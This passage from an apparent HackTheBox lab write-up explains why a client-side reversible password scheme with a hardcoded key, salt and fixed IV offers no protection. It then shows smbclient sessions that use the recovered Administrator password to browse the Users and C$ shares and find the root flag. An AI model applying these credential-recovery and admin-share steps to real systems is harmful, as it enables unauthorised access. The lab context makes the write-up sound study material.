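On .NET 6 and later the `Rfc2898DeriveBytes` constructor used here emits an obsolescence warning because of its SHA-1 default; that default is exactly what the VB code relies on, so keep it. The lesson of this box is in the parameters: reversible "encryption" whose passphrase, salt and IV live in the client is only obfuscation, since anyone who can read the binary or sources (here, from an SMB share) recovers every secret it protects. The fixed IV also means identical passwords produce identical ciphertexts, and iteration counts of 2 and 3 give PBKDF2 no stretching effect at all.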
Tadaaaam! With the decrypted password we can authenticate as Administrator and go get the root flag.
For your information, I first went to the `Users` share and this is what I found.
```bash
$ smbclient -U "Administrator" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Fri Aug  9 17:08:23 2019
  ..                                  D        0  Fri Aug  9 17:08:23 2019
  flag.txt - Shortcut.lnk             A     2384  Fri Aug  9 17:10:15 2019

                10485247 blocks of size 4096. 6544908 blocks available
```
No root flag… But a “flag.txt” file (impossible to retrieve for me).
After a few seconds, I thought about the fact that the `Users` share was a copy/reproduction of the `C:\Users` directory of the machine, and that having administrator rights, we could simply connect to the `C$` administrative share.
```bash
$ smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 08:20:50 2020
  ..                                 DR        0  Sun Jan 26 08:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 23:02:44 2020
  root.txt                            A       32  Tue Aug  6 00:27:26 2019

                10485247 blocks of size 4096. 6543963 blocks available
```